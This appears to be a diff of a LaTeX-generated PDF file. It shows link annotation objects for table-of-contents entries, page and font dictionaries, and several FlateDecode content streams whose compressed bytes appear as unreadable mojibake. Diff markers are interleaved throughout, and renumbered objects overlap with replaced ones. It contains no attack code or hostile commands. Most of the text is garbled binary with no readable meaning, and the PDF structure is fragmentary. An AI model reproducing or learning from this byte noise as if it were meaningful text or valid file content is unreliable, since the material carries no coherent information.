=´K8Ã2¦[gÌã;!³àFrÆ•7ì*C›e¦Ô¤kâ{(‚è17EvC¸ÅûãX5^ËB¼.¨MF5x0ƒè°>"© þ%‹cžvXòœ‘‰8Óþ"“Ô"ó¨HÓF·«ÈzˆBpô£½ØÀ ÚÆIZÂÈÃÜïx8dÍD%`_ñ\èQ­M/ZVœ|ù~®»AMÂr¢ò¢@׺¬¯ÛÌ–QY.’XÒq:rÀ¥½^Zf·ÎZî§Ý¦Í-4½ò”U“ å+iñ&­wƒ;?‰"/»3ÃøÉÍ »pïÊ”Öä\ÞUs@›L‰¤ÈgÉåì‚U¡!»æaø›^À•#ò«T~ê«õÝžuÿ‡?¢‘0‰Ùþ% ­/Îâªn =ÿUþðUK´ Kü,Q–Nc -ç¿Vg¤D›ÛãÅä;Ýÿù> -endstream -endobj -384 0 obj << -/Type /Page -/Contents 385 0 R -/Resources 383 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 345 0 R -/Annots [ 333 0 R 346 0 R 347 0 R 348 0 R 349 0 R 350 0 R 351 0 R 352 0 R 353 0 R 354 0 R 355 0 R 356 0 R 357 0 R 358 0 R 359 0 R 360 0 R 361 0 R 362 0 R 363 0 R 364 0 R 365 0 R 366 0 R 367 0 R 368 0 R 369 0 R 370 0 R 371 0 R 372 0 R 373 0 R 374 0 R 375 0 R 376 0 R 377 0 R 378 0 R 379 0 R 380 0 R 381 0 R ] ->> endobj -333 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 749.49 327.895 758.344] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.10) >> ->> endobj -346 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 730.714 430.789 739.568] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.11) >> ->> endobj -347 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 710.001 149.026 720.792] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.4) >> ->> endobj -348 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 690.672 238.336 702.624] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.1) >> ->> endobj -349 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 672.449 342.807 683.239] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.2) >> ->> endobj -350 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 653.672 420.414 664.463] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.3) >> ->> endobj -351 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 634.896 254.272 645.687] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.4) >> ->> endobj -352 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 616.12 216.257 626.911] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.5) >> ->> endobj -353 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 597.344 270.734 608.135] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.6) >> ->> endobj -354 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 578.568 158.765 589.358] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.5) >> ->> endobj -355 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 559.238 379.134 571.191] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.1) >> ->> endobj -356 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 541.015 315.915 551.806] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.2) >> ->> endobj -357 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 522.239 304.82 533.03] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.3) >> ->> endobj -358 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 503.463 303.962 514.253] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.4) >> ->> endobj -359 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 484.687 160.286 495.477] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.6) >> ->> endobj -360 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 465.91 366.684 476.701] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.6.1) >> ->> endobj -361 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 449.071 167.176 457.925] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.7) >> ->> endobj -362 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 430.295 174.148 439.149] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.1) >> ->> endobj -363 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 411.518 197.914 420.372] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.2) >> ->> endobj -364 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 392.742 218.36 401.596] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.3) >> ->> endobj -365 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 373.966 408.545 382.82] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.4) >> ->> endobj -366 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 355.19 166.373 364.044] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.5) >> ->> endobj -367 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 334.477 241.047 345.268] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.6) >> ->> endobj -368 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 315.701 210.447 326.491] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.7) >> ->> endobj -369 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 298.861 227.49 307.715] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.8) >> ->> endobj -370 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 280.085 215.787 288.939] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.9) >> ->> endobj -371 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 261.309 246.719 270.163] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.10) >> ->> endobj -372 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 240.596 268.05 251.387] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.11) >> ->> endobj -373 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 221.82 289.741 232.61] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.12) >> ->> endobj -374 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 203.043 273.667 213.834] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.13) >> ->> endobj 375 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 184.267 189.78 195.058] +/Rect [85.944 536.353 136.161 545.207] /Subtype /Link -/A << /S /GoTo /D (subsection.5.8) >> +/A << /S /GoTo /D (subsection.1.4) >> >> endobj 376 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 165.491 353.819 176.282] +/Rect [71.004 507.617 130.31 516.485] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.8.1) >> +/A << /S /GoTo /D (section.2) >> >> endobj 377 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 146.715 369.727 157.506] +/Rect [85.944 488.841 181.576 497.695] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.8.2) >> +/A << /S /GoTo /D (subsection.2.1) >> >> endobj 378 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 127.939 217.336 138.729] +/Rect [85.944 468.128 274.386 478.919] /Subtype /Link -/A << /S /GoTo /D (subsection.5.9) >> +/A << /S /GoTo /D (subsection.2.2) >> >> endobj 379 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 109.162 342.835 119.953] +/Rect [85.944 451.288 187.041 460.142] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.1) >> +/A << /S /GoTo /D (subsection.2.3) >> >> endobj 380 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 90.386 376.589 101.177] +/Rect [71.004 420.615 198.218 431.42] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.2) >> +/A << /S /GoTo /D (section.3) >> >> endobj 381 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 71.61 419.058 82.401] +/Rect [71.004 391.879 197.445 402.683] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.3) >> ->> endobj -386 0 obj << -/D [384 0 R /XYZ 72 793.935 null] ->> endobj -383 0 obj << -/Font << /F21 343 0 R /F15 339 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -406 0 obj << -/Length 2932 -/Filter /FlateDecode ->> -stream -xÚåZY“ÛÆ~ß_Á·`«D÷ñ(Y–"—uØ»ª$¥øaÌ’ˆpÐ`%þ{÷5 Hb%—¹œòfzz®žî¯Ò[mWÞêÅÕ¯W>|½•¿JƒUš{®Ÿç«¢¹zÿ‹·*þÃÊs£<[}$®f%|ëÕÍÕOWOo¯?üUîæI¬nïxÐÍÃxu[®Þ;¾{½ÎòÈyÙ^‡3ôÝõ¾åX U×^ÿrûÃãç~<›%¡ë°Í‘ãÊ““ò)û­÷çW«uÄ®ŸúÐÝ(ÊyZìænt½öý(rn†®×%ì†Î·2§ÐåØk¦mÆ{a¨{îu×AêÜ_îwØüÈcúÓ¾îªAÙ“OçZ½_§~àÀMcÏûVŸ(Ïÿ‹égÇõ}?wÒè‹Ò 7÷òÕÚÏÜ4M¬p}– çUe -]תÕÝhηˆÓü¹Ù-Éo¿ßâ[Å_z«‡žÊõ¯× ØÁ÷f¨5XS€Ž@w‡ßÈQ}_Ý_lj£êó# ÿeãëÄï-H>`É¿Ûè” |–¸ùµnÔ^Þ¡cé;¬Í Â8¨M-ô{D&}í;½ds*h]ÂPøÍaèùl‹’N¿FÒ!KúF!\‹¤Hjª}ïµ­Æ«ºæ<‰bñ÷zè+ÍÀ/3@ºÌÍFSY¸†æò‚üϢÍ~¯hÓ™h£‡DÛíÑšEa¤(¥íØ£º* 3½%®—¯_~Nœy’þÿAÊ…àÏIó¯Ñé˜ÿå^ ,1”ž¯íÚuÕâà {á+/ ´á8§¼iä§—»¤ý™ÿ5ð#|Wk%>îÏûÙÓW7Jâ .foØh´Š -u½`žwÏžŸ¡áýB(åÿIü`|AˆgÙÀ:LÝ ¢r¸¾›†"XiÄÎ3ˆkaHºU'n%6Èl°û '¯. •òêOÆa×ýž•áİ`ä†QБ§U#x~Ib0—¡`ãKã&‰ñèHIij­*aâT†¿¨MA˜ˆÂ Uº¦ûB3KÑ5 (ƺ®Z¡¨qè „«Š‡$òžØn~úQ6kÿ£‹¥l†ˆ®Fe€°áå GÛvž–Xát%†ƒF0Â.i-«‚=tÊ¢ÈoˆØ¤¶„Ad\¡›ËƒÎ ä¬I8;+ÑïǺXÛTu5TÚ0±j™÷#í¶a¢Úï몠¤ÌàUßyÓ’ qÆÀ3øäè°QÐUôZšB„¦ëõÉÁ‚ãÁ¦9L'û§†"·……õprWÉFw¡°c™”FÎh0ã ÒÐ)H°¾uב>tFøTÓµ[WüaáB°2Ú ‘Ä ì“OF"=EÅú»®odUÙRtk&ÏCU`ïÃZÓë¦$m”=¨$úò­n@gaÙÅ›ƒtƒæ‘oo·ºß÷Ox„t_".XêSx–zópËi!YÒÃSÙ¸bcÆ>°lÁ'ݶ“è›3±WÆ6u½¬»Sf§§aȈªZo‘°pM+b÷r„ß‹hgPþŠŠ ^Hú…tÜûo†i“W —@Q§7yàe_ð¸èj8þØ´´‹ï9ýØ2ë®2ÌÉE -¡’â"’‡_)c¡Ã {­J™Ó3ûǾôÒåtÊÚó´[™LËMÕªþÀmŽÞ wèÉ€‘Ýã4ÊmÖ º*Ÿ.ÆAFT¿©†~ZR°ï¡5;Wñæ†{ÿäQkZÜCpE¬JÍ\ ár,@ í¶ºd*…»|õªç ©a¾56Ы˜a­XJÚ.$D€„ý˜8Ç †gQHļŽ.…:c—9…iY]X›OO~Fã~=¹>ìq¦u+wÖS|ÊñWO^=K")OÛùå ÚjlŽåS°;z–ÁOàžc¸YSmVŸû0¢çÞ‰«Å ÏÑHzµÄŒ.À˜øÐ0¢Í¾(±O6K½DùÃúÌ_â©Äúæ?EñÈÝØR,¢()²/î9ìèú‡O-Ã0±j϶åÔ(â`É ÷CRáD™ÄÎ볤;Ì>£”ª€Fˆg@"é5ØšQ:UÍ¿ê ¹UT¸ R ‹ˆ¸ºQ: À^©úò3N?È,½6®0½6vºE˜ï$ç´•©)²GvXf‰³#âЕ1°¡jƒº‘yù´4å™h/ ~Y{ù­9Ý…âÂÀQq3O–ô§„š€èT©Í|yd°jƒªÞB¸=쮦]b×Raé÷¤!¤!7…†ì¸ê¾œ~ü¨.@â©,C‡ [G`€# 6Ʋšÿ¢ÂIpJhšn„Ʋ‹`¼Ô/©s‡#ÖZl•ç«eÓj{¶ê“3ª¢ÐûAîqÌn ƒÅzö,ÚW´`óz$ÓÕ²UUøÙ_C"7Ž3‹æ/¾¿]BüÜÃ|†ø—Ëø›†‘eyûæfi rÓdÚk¯Ðé$ÑñÈFçï··ovÈSÜ“ü]×}¨ôÂ!(B0y'ùéý(‚ž¿ì‘Ænä‡vò;”ó“­n‡…} Ÿñ£‰u¡eíiOŒ!¼xnÑ©ÓÊ_Ø5&±›zg!>)†²bÇ~—~ÂÆzJ¢0PyÄZŒ4EE…bà€7ž Æ˜—˰¸Î¬> Ýy}˜g‰söÛ½#öžŒJÀ5ªa{òùÁrÃ߆’µ³_AøûýíÕo|n!\ -endstream -endobj -405 0 obj << -/Type /Page -/Contents 406 0 R -/Resources 404 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 345 0 R -/Annots [ 382 0 R 387 0 R 388 0 R 389 0 R 390 0 R 391 0 R 392 0 R 393 0 R 394 0 R 395 0 R 396 0 R 397 0 R 398 0 R 399 0 R 400 0 R 401 0 R 402 0 R 403 0 R ] +/A << /S /GoTo /D (section.4) >> >> endobj 382 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 747.553 339.57 758.344] +/Rect [71.004 363.142 117.812 373.947] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.4) >> +/A << /S /GoTo /D (section.5) >> +>> endobj +383 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 344.366 185.906 355.157] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.1) >> +>> endobj +384 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 325.59 139.37 336.381] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.2) >> +>> endobj +385 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 306.814 195.59 317.605] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.2.1) >> +>> endobj +386 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 288.038 360.819 298.828] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.2.2) >> >> endobj 387 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 730.714 170.44 739.568] +/Rect [108.853 269.261 278.951 280.052] /Subtype /Link -/A << /S /GoTo /D (subsection.5.10) >> +/A << /S /GoTo /D (subsubsection.5.2.3) >> >> endobj 388 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 711.938 252.529 720.792] +/Rect [108.853 250.485 349.074 261.276] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.1) >> +/A << /S /GoTo /D (subsubsection.5.2.4) >> >> endobj 389 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 691.225 328.061 702.016] +/Rect [108.853 231.709 325.571 242.5] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.2) >> +/A << /S /GoTo /D (subsubsection.5.2.5) >> >> endobj 390 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 674.385 364.637 683.239] +/Rect [85.944 212.933 145.623 223.723] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.3) >> +/A << /S /GoTo /D (subsection.5.3) >> >> endobj 391 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 653.672 313.784 664.463] +/Rect [108.853 196.093 266.916 204.947] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.4) >> +/A << /S /GoTo /D (subsubsection.5.3.1) >> >> endobj 392 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 636.833 265.035 645.687] +/Rect [108.853 177.317 238.17 186.171] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.5) >> +/A << /S /GoTo /D (subsubsection.5.3.2) >> >> endobj 393 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 616.12 387.462 626.911] +/Rect [108.853 156.327 259.086 167.395] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.6) >> +/A << /S /GoTo /D (subsubsection.5.3.3) >> >> endobj 394 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 589.32 140.955 598.188] +/Rect [108.853 139.765 243.399 148.619] /Subtype /Link -/A << /S /GoTo /D (section.6) >> +/A << /S /GoTo /D (subsubsection.5.3.4) >> >> endobj 395 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 560.584 124.222 569.452] +/Rect [108.853 120.988 235.514 129.842] /Subtype /Link -/A << /S /GoTo /D (section.7) >> +/A << /S /GoTo /D (subsubsection.5.3.5) >> >> endobj 396 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [287.982 489.407 349.183 500.198] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 99.999 351.937 111.066] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.6) >> >> endobj 397 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [172.983 333.811 206.931 344.602] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 83.436 286.2 92.29] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.7) >> +>> endobj +401 0 obj << +/D [366 0 R /XYZ 72 793.935 null] +>> endobj +402 0 obj << +/D [366 0 R /XYZ 72 760.449 null] +>> endobj +407 0 obj << +/D [366 0 R /XYZ 72 631.328 null] +>> endobj +399 0 obj << +/Font << /F17 403 0 R /F15 404 0 R /F18 405 0 R /F20 406 0 R /F21 408 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +450 0 obj << +/Length 1508 +/Filter /FlateDecode +>> +stream +xÚíZK{›8ÝûW°Ä SôBhÙ4v§ýfÒvâ¬Ò.(Vfx¸çß°æ•Ï õ´qìmŒ øœû8÷êÚÆÒ°÷£# ßm”Ù`Ìð£Ñõ7ÛXÈï?¶…™kÜoVEv\ù—£/£³ùèÍ ƒYÌŽ1¿Q×@CĘ/Œkóݧ‹ùôb~9þ6ÿøfHm)veCy­ÍBX¬Ùú¡Ô¥Kýd¿ ‰(…1S?#²ÜñŒÍ?æóÏã BÈ\¥ÉºæZž06®'ò?šÖxBì=¾aÆö~Íßs¿XfB¼‹ۘעÔÙ²Â4+ï’ØÏÓ”Ç#™â§d +›)ÿ‘s‘‰ö}§߯6´‡ ìñÄ‘`ŸóÐ+p~Pèc`Æê£à~/„Âÿûx"ñ¬Xz_¼p«3Üó‹ã[õ£­GižÚOŒmð¢9èµf2` ¾¬Ã˜% +¦ „^5À½IR®—Or}Vþ<æ~$qûádJö‡,TÈþå­ƒ¨2R2`Ðâ@~¥!MՉ䦴É, ¸æâþ–kKÏny3Ê4@¯3Ò‰:®ë¾Ó£5€h„Oƒx©ÿƒ—.y&Ô¾I“¨‘úî‚_Ô¾¡æúA†‰¾@.ªk¥|™‡ž†—¯Wi‘8¹ ¢ø Š0ÒµWFÉÞ,­7Ê»îÄk¡ÅlÖ6+,ŸÛ†Ðüÿóˆ³1òšË‹Hd;É{„; hé0»ÒEæ}µK¯¼Ô‹¸tƒ¯6±…|uç ce´7â8ÏÉØ‚ÿY’úe+ë“”xBE^ì-yTxRm<ˆŒ—q\2Öq?—žn  D{…2YéDèeUìÞ 5Å/$º —¥B.²2UäÖŽ_ä°‡0ñìÈË3w€aùçv]òR(E2Ä¢›0LOoWÆcˆp4Óµæ ̓Ўî_m„ýÒ¶4©Á7¹S•9Rù¼b­Òç TŠD+E¥5TñE±ÛÕ»è$÷-ò&IG$*ÏU·ö Lu2þ-<¤,…$­Ûбªà ³`U*ÌMÅ“yEJ•%ò/%4Õé|¥\3I{ÜŽý>Þz>;“Jü=‚kQ:ë>‡”- ¥Q¾‡A¬!¾üòg;·ó5A‡gì½ð¢g‡{R ÂGེøðébk¬º·TÀ¡Ç“^ˆñˆK9y%Új»BoÑ}ŠÉ"æz@ïEwh{ÅÑIs&«ž®Ò@,ív§f Û·KÐaÓ©2æt-…£î6å »ÊÐf™YhÒ-ñ=Aô’›"»!lÚ}•©¶ûi¬Õ›B¼§3jÓ“Ü›ŠÁ`˜ÁÓÊàϼ8æi‡%—œ˜øygÚMÝe¦™—\ˆªÇ“‹.I˜“× ¢ U¸Æ†}-?´éAäév10QjØsžIIªåéMCÎ{úmïQëtëõåvoq 2™¹Êš£(„ÏÏÞöí¦0àüúôütÀ¶‰¹êgJÑŸv[7?·ÝpÄv½7ƒvüè~¦÷…~LRÝ<¸õÄm·ñ†÷9 ô +.?í? î‚/{'ðä O$ƒ £X|;–×0ïÆÄ1½ Üîr—»C dôDÌ£TÐT”SŠçäz¸F’Ñ3”ˆO2§v¿¾†>¦’w5¾Ø*µ¹? ó(îB0i÷š>`úåHãy­ºÃ¸¿®6{'íƒÇóÉŠ·sÜ¢í…aöÚÌ]¿Ø‰?¤G0ÅD†dÙrnrºæ~ž•¤6brY ^öþÅfÏ÷7²‘ ^eŒïÅšÜpus´˜“ß4‰Ë×›<® ó<ºÏòôróõT}IÔ‘a=«ëY%S·êzªÙ×®Ùç~pÅOmküê|Ö× ÿÃàì/²l ´lVmwUSµÝÏ÷¹è™§^à –Úåmó}:ý˜û +endstream +endobj +449 0 obj << +/Type /Page +/Contents 450 0 R +/Resources 448 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 410 0 R +/Annots [ 398 0 R 411 0 R 412 0 R 413 0 R 414 0 R 415 0 R 416 0 R 417 0 R 418 0 R 419 0 R 420 0 R 421 0 R 422 0 R 423 0 R 424 0 R 425 0 R 426 0 R 427 0 R 428 0 R 429 0 R 430 0 R 431 0 R 432 0 R 433 0 R 434 0 R 435 0 R 436 0 R 437 0 R 438 0 R 439 0 R 440 0 R 441 0 R 442 0 R 443 0 R 444 0 R 445 0 R 446 0 R ] >> endobj 398 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [369.54 306.554 419.391 317.344] -/Subtype/Link/A<> ->> endobj -399 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [163.911 246.891 264.392 257.681] -/Subtype/Link/A<> ->> endobj -400 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [222.676 233.262 265.892 244.053] -/Subtype/Link/A<> ->> endobj -401 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [408.48 214.486 460.274 225.276] -/Subtype/Link/A<> ->> endobj -402 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [455.617 187.228 491.944 198.019] -/Subtype/Link/A<> ->> endobj -403 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [320.059 173.599 347.422 184.39] -/Subtype/Link/A<> ->> endobj -407 0 obj << -/D [405 0 R /XYZ 72 793.935 null] ->> endobj -6 0 obj << -/D [405 0 R /XYZ 72 546.571 null] ->> endobj -10 0 obj << -/D [405 0 R /XYZ 72 381.064 null] ->> endobj -14 0 obj << -/D [405 0 R /XYZ 72 147.029 null] ->> endobj -404 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F20 341 0 R /F24 408 0 R /F22 344 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -416 0 obj << -/Length 2787 -/Filter /FlateDecode ->> -stream -xÚÅYëoÛ8ÿž¿ÂØ]\el­èA½Z‡n›n»ØmÓÆ‡â Ùfl¶z8¢Ô4÷×ß g(KŽšëí}¸/IÉyÏoo¶y³_O®O|øz3–³$ó\?Ëfëòäò£7ÛÀúo3ÏY:»1TåLÄ)|‹ÙÅÉÛ“_–'§/–¹YijåºYÍ–›Ù¥ã»óEš çU5§mêù¾›nݪºš\þvúÂûEº^˜Ý)N<æt¶à_"t…ȈFUWuSææ<8[8¹¦ï~¾§Ö0õ5÷U!é—ºkypEßvÇ¿Ü̃ԑ+>h¿/ÔÚœü€Ï\åk¤ø¼Õ†V6y›¯rmö‡N™WùV–²šÃÕ-­é[d@·²¤yÝÐNùÅ\Æ\Ã8㛑UÄ^ø¡)ÉÚ¢úÂÐÉ×k‰rá˜x…ÓUÙ·ªÚÒõžŽl@»¦o‘·?;u“$¡³ŸÕ•Vp‚=5oéX>–òf+[wMA¥ld¿àñ,³ÆÍ7ó’ðã&! ³kÛý£ÓS? \?N]ßõ0’ª¯‹2ߟ–·08…ÿTUëîwû¿«ÍÂe£ÃÙ+žjÝ•ò ËÏeö?pùóÓ×Ïö¿Ÿ[5¶%Ø ]&‡‹J6îÜŠmL[7j«ªœ RW¼#¯6ÿ¡ƒïz£>xa(”'ñœ«¦Æ‰3– –’Á2Hö×3Gµô;(´Tñì²0ºÅÀª;šä¤ýªê/ª€‰M@:¢ºxû;ÍUõI®9«Àú—®¨ ”Vª€Ûa÷­¥²—K’;†Ù,å%}:S"þõl9¥$KM!ÏZÚçM^Êã2ˆ2Ã-~§ïK óa$„¯hž©<›¹±è)û´‡GÒ-ïáèf§LþÛÑ´”FùÄ*GºnMãW`Ÿç8¿8ÅáùÅû4÷ß ."ihò¢xh×ÂB7Šãqn¬87ö -ÓháË<Š`sgC+¯T«þe †Éa¼“ó%Ö¹±át”µl(o7 L—“©t¹3G¦c¿è\iè\wª•´²®ËÒc2ÊñÐÞÅëS9ª¼Ä굦#Öì¼²÷a <”-  bd ˆšM½Â³y˦&i™Áª¶ë’Õ`7t4·¼’"``Ja¥pT¨Økyw8,©–Gæý¨<¼2õˆk¡¢!_¢ É‘ Ö°°oê-¿¤rûмÚvpã£ù"‚el•¬"úmc5wMŠÚHƒ"°îšC€¶_âÜÚ‰¼@rêE\Õl`½ siv¼±J¦ÞÏ#LžŽÄ‚… {ab/eA -¨MÅDûÆž­cà™Æ/a J†‡MkKmÙàçC@á&4*ÙÚd’gЖ§8E©é¨.Uaå­¿%Å‘¢ž5€Y”) ã\¬µ7îX øqœb:áF©ó…ð=̓z-«¼Q5°+‚ Ý€ó–©P–‹áÝ*ã§+"[;.Î~?{6UϨ2K¦[pÆCäãéÊN°ܽ&NÜ,MìþÚ@ú©’ûnìÅ–~‡îƒ·ä,ô-Ý–Å9$…n£Š¼j©÷¶Ù"‰yGÕøª.ŠÚdêR`€qÝÉÜ@79À°¬hÙm¸8¿<§AŸUþ2Fû‰î[DAä<¡Ï ›ÃÌ/×uÑ•Õ/ò4üñiê‰üHÃïÞÀ–?˜º5mÇ1Íû—gïÎhøÅwžü@Hu>ìüô绳·ÿ8»X^>P›?BMdѬÁd£Ò2L²öŒýö}A"gˆmm2„I &kh{oäha"VÄ ú‚) 6b”*iXϯZ{NNCäSÀnb˦ŒwW¾pÃC$tC‰{&Œ× O¸”ž‘×ݨ0°ðfåŸM¤Ù¾Èש7;¬%†ÄoŸÃX‹P@kû\k©‡É¶³WÝMðÛ¸ûÅŸå?.ïw¦´O`Æë"säW¨p­"àPªÅŠÂâŸnv¶>Û&À*Š5ÔâtE^×è ô+4˜îÔâØ`iM—²K_O#¯L†>‘ºAïËy’8M''®|¸¢çŒB¥2¢5²íšJ†ÎKÛBÜ2 ¢üN'Ò#OºÓ+>¤ÑjwÜVÚüOXÙöÐwa'µ˜‡íô¨‚›v£ IÑJV;¤K€ Mc”Rkd²–ýQ7ҜǨ;ˆ,6ï9Ø"¤1 ANßc ÒˆxÃE™#Â4„5}±³#ÌD»¸ò-í7H³îŠ Mûç¤É 